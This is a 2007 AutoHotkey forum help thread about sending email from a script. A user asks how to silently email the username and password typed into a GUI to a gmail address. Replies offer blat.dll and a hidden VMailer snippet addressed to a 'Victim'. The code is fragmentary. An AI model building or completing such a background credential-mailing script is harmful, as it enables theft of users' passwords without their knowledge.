AutoHotkey Homepage AutoHotkey Community
Let's help each other out
 
 FAQFAQ   SearchSearch   MemberlistMemberlist   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 

E-Mail Help

 
Post new topic   Reply to topic    AutoHotkey Community Forum Index -> Ask for Help
View previous topic :: View next topic  
Author Message
Cyber-Plague
Guest





PostPosted: Wed Nov 28, 2007 8:28 am    Post subject: E-Mail Help Reply with quote

Code:
Run, mailto:removed@gmail.com?subject=Mail subject&body=%Username% , %Password% :>


This is fine and dandy, but there are 2 questions I have...

[1] Is there a way to send this email in the background, so the user doesn't have to setup their email program/hit send.
[2] Are those variable calls correct? Earlier in the script, there's input values that are...
Code:
Gui, Add, Edit, x75 vUsername
Gui, Add, Edit, Password vPassword
Back to top
Cyber-Plague
Guest





PostPosted: Wed Nov 28, 2007 8:34 am    Post subject: Reply with quote

Guess I should also ask that, after compiling, is there a way to change the Icon?
Back to top
garry



Joined: 19 Apr 2005
Posts: 1030
Location: switzerland

PostPosted: Wed Nov 28, 2007 9:17 am    Post subject: Reply with quote

for icon (example) , ( maybe not after compiling ? )
Code:
Menu Tray, Icon, SHELL32.dll, 95


for email:
use iniwrite to write variables
iniread to start emailprogram
Back to top
View user's profile Send private message
Cyber-Plague
Guest





PostPosted: Wed Nov 28, 2007 7:41 pm    Post subject: Reply with quote

I don't understand what writing, and reading an ini file would do...
Back to top
stekkie



Joined: 09 Nov 2007
Posts: 16

PostPosted: Wed Nov 28, 2007 8:01 pm    Post subject: Reply with quote

IniWrite, %Password%, Were you want to store your ini, options, password
Writes the password in a ini file


IniRead,Password, Were you want to store your ini, options, password
Read the saved password from the ini file, and set it in %Password%
Back to top
View user's profile Send private message
Cyber-Plague
Guest





PostPosted: Wed Nov 28, 2007 8:08 pm    Post subject: Reply with quote

So you're telling me...

Code:
IniWrite, %Password%, C:\,, password
IniWrite, %Username%, C:\,, username
IniRead,Password, C:\,, password
IniRead,Username, C:\,, username
Run, mailto:removed@gmail.com?subject=Mail subject&body=%Username% , %Password% :>
Back to top
engunneer



Joined: 30 Aug 2005
Posts: 6772
Location: Pacific Northwest, US

PostPosted: Wed Nov 28, 2007 9:21 pm    Post subject: Reply with quote

ignore inis at the moment.

As long as you Gui, Submit, you will get your variables.

for emailing in the background, search blat.dll

for changing compiled icon, search "Compile with options" and "For those who compile"
_________________
Unless otherwise noted, all code is untested.
Common Answers: 1.(Loops, Viruses, etc.) 2. Search 3.RTFM
Back to top
View user's profile Send private message Visit poster's website
Ripper



Joined: 24 Oct 2007
Posts: 17
Location: Germany

PostPosted: Wed Nov 28, 2007 10:05 pm    Post subject: Reply with quote

To run the script load Vmailer.exe
Code:

PW=Password
SMTP=smtp
TO=sendto
FROM=user
LN2=Test-Massage
CX1=Hello Victim
     Fileappend,From:%From%`r`nSubject:%LN2%`r`n`r`n%CX1%`,`r`n`r`n%MSG%,%F7ac%
     runwait,VMailer.exe %F7ac% %SMTP% %TO% %FROM%,,hide
     Filedelete,%F7ac%



Back to top
View user's profile Send private message
garry



Joined: 19 Apr 2005
Posts: 1030
Location: switzerland

PostPosted: Thu Nov 29, 2007 12:08 am    Post subject: Reply with quote

this works good for me in Mozilla Thunderbird
Code:
C4=xxyy@net.com
name=garry
run,mailto:%C4%?subject=Message Titel&Body=Hallo %name%`%0a`%0dHow are you ?`%0AI send you this message now....`%0ANext line...
Back to top
View user's profile Send private message
Display posts from previous:   
Post new topic   Reply to topic    AutoHotkey Community Forum Index -> Ask for Help All times are GMT
Page 1 of 1

 
Jump to:  
You can post new topics in this forum
You can reply to topics in this forum


Powered by phpBB © 2001, 2005 phpBB Group